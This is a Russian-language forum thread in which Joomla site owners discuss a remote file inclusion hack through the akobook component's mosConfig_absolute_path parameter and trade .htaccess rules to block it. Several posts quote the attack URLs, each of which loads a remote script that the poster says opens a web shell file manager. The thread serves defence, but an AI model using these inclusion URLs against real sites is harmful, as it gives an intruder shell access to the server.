Взломали сайт через mosConfig_absolute_path

Помогите с проблемой.
Взломали сайт через mosConfig_absolute_path, подставив его в качестве параметра компоненты. Компонента - akobook

Уязвимость можно бы устранить, запретив register_globals, но у меня стоит компонента AkoForms, с помощью которой пользователи заполняют веб-формуи отправляют сообщения с сайта, и при отключении register_globals она перестает работать.

В некоторых источниках описывается устранение этой уязвимости вставкой в компонент кода:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

Код в компоненте есть, но уязвимость не устранена.

Больше никаких решений этой проблемы я не нашел. Если они есть, будьте добры, ткните пальцем

Реальная помощь в решении проблемы может быть оплачена.

Спасибо.

 

Ответ: Взломали сайт через mosConfig_absolute_path

Покажь через какой файл ломают (запрос) и в каком месте эта штука есть.

 

Ответ: Взломали сайт через mosConfig_absolute_path

Не понял? Что показать? Как сломать сайт и чем? В общий доступ? Ключи от квартиры, где деньги лежат, тоже дать?

Заходят так:
/component/option,com_akobook/Itemid,37/home/skboku1/public_html/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?

 

Ответ: Взломали сайт через mosConfig_absolute_path

Хе-хе, а теперь показывай где в akobook.php ты этот код вставил. Я бы вообще на твоем месте сделал то, что по-моему в версии RE по умолчанию сделано - защита от этих ?mosConfig... прямо в .htaccess

 

Ответ: Взломали сайт через mosConfig_absolute_path

Показываю:

А вот за подсказку спасибо большое.

Нашел в .htaccess строчки. Они оказывается по умолчанию закомментированы. Задействовал их. Теперь эта дырка закрыта

 

Ответ: Взломали сайт через mosConfig_absolute_path

Если эта строка там есть, то дальше нее прямой вызов не уйдет.

 

Ответ: Взломали сайт через mosConfig_absolute_path

Так в том то и дело, что строка эта есть, но именно так и взламывают. Я думаю, может как-то эмулируется _VALID_MOS ?

Добавлено через 7 минут
Ведь ссылка для взлома гораздо хитрее
Не просто
/component/option,com_akobook/Itemid,37/?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?
, а
/component/option,com_akobook/Itemid,37/home/skboku1/public_html/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?

Зачем-то ведь добавлен фрагмент: home/skboku1/public_html/components/com_akobook/akobook.php

 

Ответ: Взломали сайт через mosConfig_absolute_path

как зачем добавлено, идет вызов файла, иначе бы index.php подцепили бы

 

Ответ: Взломали сайт через mosConfig_absolute_path

Идет вызов вот этого файла, как я понимаю: http://www.ХХХhackers.net/r5Х.txt

 

Ответ: Взломали сайт через mosConfig_absolute_path

Нет, akobook.php, а через него уже эксплойт

 

Ответ: Взломали сайт через mosConfig_absolute_path

У меня на сайте нет пути home/skboku1/public_html/components/com_akobook/akobook.php У меня вообще нет папки skboku1
тогда чей это путь? Какого сайта?

 

Ответ: Взломали сайт через mosConfig_absolute_path

а спорим есть components/com_akobook/akobook.php , если у тебя конечно, эта гсотевая вообще стоит.

 

Ответ: Взломали сайт через mosConfig_absolute_path

А был ли мальчик? кто вообще сказал, что именно так был взломано?

 

Ответ: Взломали сайт через mosConfig_absolute_path

Да этот путь есть. Вопрос тогда, зачем упоминание про home/skboku1/ ?

Добавлено через 3 минуты

Мальчик был. Во первых, заходили по этой ссылке, во вторых я сам заходил. По ссылке открывается очень интересная софтина. Очень красиво и грамотно написан менеджер файлов. Я пробовал - и редактировать можно, и удалять, и закачивать файлы. Мне бы кто такое написал - я бы вместо ФТП-клиента пользовался - очень удобно

 

Ответ: Взломали сайт через mosConfig_absolute_path

Titanium,

Абсолютный путь ет. "Серверный".

Это xxxx (блин, слово забыл, вспомню, напишу), позволяет работать на сервере с правами root'а

 

Ответ: Взломали сайт через mosConfig_absolute_path

Нет такого серверного пути! Ну вы меня совсем за дурачка принимаете что ли?
Я потому и спрашиваю, зачем подстановка home/skboku1/public_html/components/com_akobook/akobook.php
если у меня на сервере аналогичный путь: /home/vizitki/site.ru/docs/components/com_akobook/akobook.php

или это просто наобум выбраный или есть какой-то тайный смысл.
Почему не вызывают просто через /component/option,com_akobook/Itemid,37/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?
Или так:
/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?

зачем там лишний путь еще?

 

Ответ: Взломали сайт через mosConfig_absolute_path

А вам это надо? Раз не верите мне, когда пишу на простом языке, пояснять не буду Разве вопрос в этом, а не как защититься?
Защититься просто, нужно сменить гостевую)

Вспомнил слово, это SHELL

 

Ответ: Взломали сайт через mosConfig_absolute_path

Блин... есть конечно разница... Я вообще в непонятках почему такое срабатывает. Мне очень интересно как такое может быть. Конфигурационный файл инклудится должен был и все перекрыть. Если конечно никаких хаков не было.

 

Ответ: Взломали сайт через mosConfig_absolute_path

Ну во первых, для того, чтобы защититься, надо знать как атакуют. Во вторых, метод взлома мной прикрыт, но такие же дыры могут быть и в других компонентах.
А менять расширение - не выход. Не факт, что другая гостевая окажется менее дырявой. Тогда уж надо сразу отказываться от джумлы.

 

Всем привиет сегодня меня пытались ломануть подобной хренью , вроде не ломанули но незнаю как это уточнить еще!!!!


сайт/index.php?mosConfig_absolute_path=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBl

у меня Joomla 13 re

какие данные должны быть в .htaccess?

########## Начало
#
# Попытка модификации переменных mosConfig* через URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# (сам не понял нафик запрещать base64_encode , будем верить автору)
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Запрет передачи тэгов <script> в адресе (скорее всего защита от XSS)
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Старая дыра, когда пытались подменить GLOBALS через RG_EMULATION
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Аналогичная дыра, но для _REQUEST
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# И в конце даем на такие запросы ответ 403 (aka Forbidden)
RewriteRule ^(.*)$ index.php [F,L]
#
########## Конец